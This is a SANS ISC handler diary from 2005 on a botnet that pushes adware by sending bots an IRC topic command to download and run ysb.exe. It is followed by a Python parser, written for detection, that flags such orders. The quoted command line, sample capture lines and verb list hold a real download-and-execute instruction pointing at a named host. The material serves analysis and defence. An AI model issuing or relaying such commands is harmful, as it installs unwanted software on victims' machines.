
SANS ISC: InfoSec Handlers Diary Blog - Botnets and Adwares-Spywares connection



Botnets and Adwares-Spywares connection

Published: 2005-11-02
Last Updated: 2005-11-02 12:47:14 UTC
by Pedro Bueno (Version: 1)
I am sure you already know about botnets, right? Ok, I am quite sure that you also know that one of the purposes of botnets, besides all the nice stuff written by our Handler Mike Poor in his diary Big Business surrounding Internet Fraud, is to spread malware, right? Ok (again), today I would like to show you how botnets are also spreading adware/spyware software. As the bot is remotely controlled by the botnet owner, it can do anything...
While investigating a bot today, I found this instruction to the bot:

:MySQL 332 USA|xxxxxxx #c :xdownload32 http://news-affairs.com/ysb.exe c:\ysb.exe 1

This instruction told my bot to download the ysb.exe 'software' to my computer and open it, as the next messages show:

#c :[DOWNLOAD]: Downloading URL: http://news-affairs.com/ysb.exe to: c:\ysb.exe.
#c :[DOWNLOAD]: Downloaded 67.3 KB to c:\ysb.exe @ 33.6 KB/sec.
#c :[DOWNLOAD]: Opened: c:\ysb.exe.

As soon as the bot downloaded and opened it, this window came up:



This 'software' is recognized by some AV engines at VirusTotal as a downloader or as ISTbar.
Nice points from the License Agreement:

9. OTHER SOFTWARE. You allow that third party software may be installed in the Software and the Integrated Search Technologies shall not be liable to anyone with respect to such third party software.
16. UPDATES. You grant Integrated Search Technologies permission to add/remove features and/or functions to the existing Software and/or Service, or to install new applications or third party software, at any time, in its sole discretion with or without your knowledge and/or interaction. By doing so, you agree to the terms of the new applications. You also grant Integrated Search Technologies permission to make any changes to the Software and/or Service provided at any time.

Ok, ok...old stuff, but always nice to know how these things suddenly appear on your computer...:)
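A note on the command line quoted above, and a small parser for it. The IRC numeric 332 is RPL_TOPIC: the order did not arrive as a message from the botmaster but as the topic of channel #c, which the server hands to every bot the moment it joins, so a standing "download and run this" instruction reaches the whole botnet with no further traffic. The trailing `1` is, judging from the `[DOWNLOAD]: Opened:` reply that follows, the run-after-download flag. The script below is an added example written for this diary, not code from the bot or from the ISC: it splits IRC lines into prefix, command, parameters and trailing text, flags download-and-execute orders whether they come via topic or PRIVMSG, and parses the bot's own `[DOWNLOAD]:` progress reports. The first sample line is the one from the diary; the others are constructed to match the replies shown, with invented hostmasks, and the verbs other than `xdownload32` are assumed variants, not names from this page.

```python
"""Pick remote download-and-execute orders out of IRC bot C&C traffic."""
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

# Verbs that fetch and run a file. "xdownload32" is the one seen in the diary;
# the others are assumed variants added for illustration.
DOWNLOAD_VERBS = {"xdownload32", "download", "dl", "update"}

URL_RE = re.compile(r"^(?:https?|ftp)://\S+$", re.I)
STATUS_RE = re.compile(
    r"^\[DOWNLOAD\]:\s*(?P<event>Downloading URL|Downloaded|Opened):?\s*(?P<rest>.*)$"
)


@dataclass
class IrcMessage:
    prefix: Optional[str]
    command: str
    params: List[str]
    trailing: Optional[str]


@dataclass
class DownloadOrder:
    channel: str
    via: str        # "topic" (numeric 332 / TOPIC) or "privmsg" / "notice"
    url: str
    dest: str
    execute: bool   # fourth argument "1" = run the file after download


def parse_irc_line(line: str) -> IrcMessage:
    """Split one RFC 1459 style line: [:prefix] COMMAND params [:trailing]."""
    line = line.rstrip("\r\n")
    prefix = None
    if line.startswith(":"):
        prefix, _, line = line[1:].partition(" ")
    trailing = None
    if " :" in line:                      # first " :" starts the trailing argument
        line, _, trailing = line.partition(" :")
    parts = line.split()
    command = parts[0].upper() if parts else ""
    return IrcMessage(prefix, command, parts[1:], trailing)


def extract_download_order(msg: IrcMessage) -> Optional[DownloadOrder]:
    """Return a DownloadOrder if the message carries a download verb, else None."""
    if not msg.trailing:
        return None
    if msg.command == "332" and len(msg.params) >= 2:   # RPL_TOPIC: <nick> <channel> :<topic>
        channel, via = msg.params[1], "topic"
    elif msg.command == "TOPIC" and msg.params:          # topic changed while joined
        channel, via = msg.params[0], "topic"
    elif msg.command in ("PRIVMSG", "NOTICE") and msg.params:
        channel, via = msg.params[0], msg.command.lower()
    else:
        return None
    tokens = msg.trailing.split()
    verb = tokens[0].lstrip(".!").lower() if tokens else ""   # some bots prefix ".download"
    if verb not in DOWNLOAD_VERBS or len(tokens) < 3 or not URL_RE.match(tokens[1]):
        return None
    execute = len(tokens) > 3 and tokens[3] == "1"
    return DownloadOrder(channel, via, tokens[1], tokens[2], execute)


def parse_download_status(msg: IrcMessage) -> Optional[Tuple[str, str]]:
    """Parse the bot's '[DOWNLOAD]: ...' replies into (event, detail)."""
    if msg.command not in ("PRIVMSG", "NOTICE") or not msg.trailing:
        return None
    m = STATUS_RE.match(msg.trailing)
    if not m:
        return None
    return m.group("event"), m.group("rest").rstrip(".")


def scan(lines: List[str]) -> Tuple[List[DownloadOrder], List[Tuple[str, str]]]:
    """Run both extractors over a capture and collect orders and status reports."""
    orders, statuses = [], []
    for line in lines:
        msg = parse_irc_line(line)
        order = extract_download_order(msg)
        if order:
            orders.append(order)
        status = parse_download_status(msg)
        if status:
            statuses.append(status)
    return orders, statuses


# Constructed capture: line 1 is the topic line from the diary; the replies are
# rebuilt as full PRIVMSG lines with invented hostmasks; the last line is benign chatter.
SAMPLE_LINES = [
    r":MySQL 332 USA|xxxxxxx #c :xdownload32 http://news-affairs.com/ysb.exe c:\ysb.exe 1",
    r":USA|xxxxxxx!bot@10.0.0.5 PRIVMSG #c :[DOWNLOAD]: Downloading URL: http://news-affairs.com/ysb.exe to: c:\ysb.exe.",
    r":USA|xxxxxxx!bot@10.0.0.5 PRIVMSG #c :[DOWNLOAD]: Downloaded 67.3 KB to c:\ysb.exe @ 33.6 KB/sec.",
    r":USA|xxxxxxx!bot@10.0.0.5 PRIVMSG #c :[DOWNLOAD]: Opened: c:\ysb.exe.",
    r":alice!a@10.0.0.7 PRIVMSG #c :did you see http://news-affairs.com/ysb.exe in the logs?",
]

if __name__ == "__main__":
    found_orders, found_statuses = scan(SAMPLE_LINES)
    for o in found_orders:
        print(f"ORDER via {o.via} on {o.channel}: fetch {o.url} -> {o.dest} execute={o.execute}")
    for event, detail in found_statuses:
        print(f"STATUS {event}: {detail}")
```

The benign last line mentions the same URL but is not flagged, because the check keys on the command verb in the first token rather than on the presence of a URL; matching on the URL alone would page you every time an analyst pastes it into the channel.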
------------------------------------------------------------------
Handler on Duty: Pedro Bueno